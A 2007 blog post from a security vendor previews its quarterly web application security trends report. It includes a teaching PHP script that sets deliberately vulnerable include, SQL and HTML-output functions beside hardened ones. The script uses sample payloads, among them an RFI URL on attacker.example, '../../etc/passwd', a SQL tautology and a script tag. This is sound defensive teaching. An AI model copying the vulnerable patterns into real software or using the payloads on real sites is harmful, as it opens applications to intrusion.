Q3 2007 Trends Report: First Look
Cenzic's CIA Labs will be releasing our Application Security Trends Report for Q3 2007 next week, but I wanted to give our blog readers a first look at our results. First, though, a few remarks are in order about the report itself for those who haven't read our previous application security trend reports. Cenzic's trends report is an industry first in many ways. It is the only report of its type that focuses entirely on application-layer vulnerabilities, attacks, and trends. Symantec's Internet Security Threat Report, now on volume 12, is the best security trend report in publication, but its focus is very broad and web application security is only a small part of the overall content. Understandably, the Symantec threat reports have a much broader goal and scope than our own, and being an avid reader of the Symantec report, I noticed the need for a security trends report that focused entirely on web application security. It was our (lofty) goal to do for web application security what Symantec's report does for Internet security in general, and although this sets a very high bar, it is the gradual striving toward this goal that means our trends report will continue to evolve and improve over time.
I want to take a moment to thank all those who contribute to the report. Since we began producing this trend report in Q1 2007 we've already seen some interesting emerging trends within the data. Although Cenzic CIA Labs performs all the research, the final report is a cooperative effort that relies on individual contributions from people both within Cenzic and from a network of friends and contacts. And of course our report could not be what it is without dshield.org and the CVE (of which I am an editorial board member).
Our Q3 trends report signals in many ways "business as usual" in the application security space. In other words, many core trends remain the same:
1. Web application vulnerabilities continue to comprise the largest part of all vulnerability data. In Q3 2007 web application security vulnerabilities comprised 68% of the total vulnerability information.
2. Cross-Site Scripting continues to be the most prevalent web application vulnerability reported, with SQL Injection and RFI attacks not far behind.
3. Directory Traversal vulnerabilities, the dot-dot-slash type attacks (../../), are among the least reported web application vulnerability types, typically making up between less than 1% and 4% of the total web application vulnerability volume.
4. SQL injection vulnerabilities continue to constitute roughly 20% of the total web application vulnerability volume. In other words, 1 out of 5 reported web application vulnerabilities is usually a SQL-related vulnerability.
5. Insecure coding practices in PHP continue to account for 30% of the total web application vulnerability volume. Vulnerabilities in PHP itself, as a programming language, tend to contribute only 1-3% of the total vulnerability volume, indicating that it is insecure coding practices, and not PHP as a programming language, that produce the usual storm of PHP-related vulnerabilities.
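To make the point about coding practices concrete, here is an added illustration for blog readers (it is example code written for this post, not code from the Cenzic report or from any application the report counts): the kind of PHP patterns that produce RFI, directory traversal, SQL injection and XSS findings, each beside a hardened form. The function names, the temporary directory layout and the inputs are constructed for the demonstration; it assumes a PHP 7 or later command-line interpreter with the pdo_sqlite extension available.

```php
<?php
declare(strict_types=1);

// Constructed example: insecure PHP patterns behind the RFI, directory
// traversal, SQL injection and XSS findings, each beside a hardened form.
// Function names and inputs are hypothetical; run with: php example.php

// 1. Dynamic include driven by a request parameter. With allow_url_include=On
//    a page value like "http://attacker.example/shell" is fetched and run (RFI);
//    with it off, "../../etc/passwd" still walks out of the pages/ tree.
function vulnerable_page_path(string $page): string
{
    return 'pages/' . $page . '.php';          // attacker controls the path
}

// Hardened: map the parameter onto a fixed allowlist; user data never
// becomes part of the path.
function safe_page_path(string $page, array $allowed): ?string
{
    return in_array($page, $allowed, true) ? 'pages/' . $page . '.php' : null;
}

// 2. Directory traversal. Stripping "../" lexically is not enough (encoded or
//    doubled sequences survive); canonicalize, then check containment.
function safe_resolve(string $base, string $requested): ?string
{
    $baseReal = realpath($base);
    $target   = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($baseReal === false || $target === false) {
        return null;                           // nonexistent or unresolvable
    }
    $prefix = $baseReal . DIRECTORY_SEPARATOR;
    return strncmp($target, $prefix, strlen($prefix)) === 0 ? $target : null;
}

// 3. SQL injection: string concatenation versus a prepared statement.
function vulnerable_user_query(string $name): string
{
    return "SELECT id FROM users WHERE name = '" . $name . "'";
}

function safe_user_lookup(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);        // value is bound, never parsed as SQL
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// 4. XSS: reflecting input into HTML without encoding versus encoding it.
function vulnerable_greeting(string $name): string
{
    return "<p>Hello $name</p>";
}

function safe_greeting(string $name): string
{
    return '<p>Hello ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '</p>';
}

// --- Demonstration on constructed inputs ---
$allowed = ['home', 'about', 'contact'];
foreach (['about', '../../etc/passwd', 'http://attacker.example/shell'] as $page) {
    printf("page=%-32s vulnerable=%-45s safe=%s\n",
        $page, vulnerable_page_path($page), safe_page_path($page, $allowed) ?? 'REJECTED');
}

// Throwaway tree: $base/docs/readme.txt is public, $base/secret.txt is outside docs/
$base = sys_get_temp_dir() . '/traversal_demo_' . getmypid();
mkdir("$base/docs", 0700, true);
file_put_contents("$base/docs/readme.txt", "public\n");
file_put_contents("$base/secret.txt", "private\n");
foreach (['readme.txt', '../secret.txt', 'sub/../../secret.txt'] as $req) {
    printf("request=%-24s -> %s\n", $req, safe_resolve("$base/docs", $req) ?? 'REJECTED');
}
array_map('unlink', ["$base/docs/readme.txt", "$base/secret.txt"]);
rmdir("$base/docs");
rmdir($base);

$payload = "' OR '1'='1";
echo vulnerable_user_query($payload), "\n";   // WHERE name = '' OR '1'='1' matches every row
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (name) VALUES ('alice'), ('bob')");
printf("prepared lookup for the payload returns %d rows; for 'alice' returns %d\n",
    count(safe_user_lookup($db, $payload)), count(safe_user_lookup($db, 'alice')));

$xss = '<script>alert(1)</script>';
echo vulnerable_greeting($xss), "\n";
echo safe_greeting($xss), "\n";
```

Nothing in the hardened forms depends on a PHP language fix: the allowlist, the realpath containment check, the bound parameter and the output encoding are all application-level choices, which is exactly why the report attributes the volume to coding practice rather than to the interpreter. The traversal check rejects both the literal "../secret.txt" (it resolves outside docs/) and "sub/../../secret.txt" (realpath fails because sub/ does not exist), and the prepared lookup returns zero rows for the injection payload where the concatenated query would have matched every user.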
These are some of the trends that have remained constant since our first trends report in Q1, trends further substantiated by the results of our Q3 report and analysis. There are several emerging trends that signal the effects of Web 2.0 programming practices and architectures within the reported vulnerability information, but if you want to learn more about those, you'll have to read our full report when it is published next week.
Thanks again to all our readers,
-Tom S.